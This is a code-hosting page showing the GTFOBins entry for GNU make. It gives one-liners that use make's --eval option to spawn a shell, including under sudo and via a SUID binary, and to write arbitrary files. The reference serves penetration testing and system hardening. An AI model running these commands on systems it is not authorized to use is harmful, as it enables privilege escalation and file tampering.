This website requires JavaScript.
Explore
Help
Sign In
dash
/
GTFOBins.github.io
Watch
1
Star
0
Fork
0
You've already forked GTFOBins.github.io
Code
Issues
Pull Requests
Packages
Projects
Releases
Wiki
Activity
Files
c31a8a1b6b5338d570f5a4a034c4f3b385dceda9
GTFOBins.github.io
/
_gtfobins
/
make.md
Andrea Cardaci
c31a8a1b6b
Simplify make
2018-06-04 18:28:58 +02:00
438 B
Raw
Blame
History
functions
functions
execute-interactive
sudo-enabled
suid-enabled
file-write
code
COMMAND='/bin/sh' make -s --eval=$'x:\n\t-'"$COMMAND"
code
COMMAND='/bin/sh' sudo make -s --eval=$'x:\n\t-'"$COMMAND"
code
COMMAND='/bin/sh' ./make -s --eval=$'x:\n\t-'"$COMMAND"
code
LFILE=file_to_write make -s --eval="$(file >$LFILE,data)" .
Reference in New Issue
View Git Blame
Copy Permalink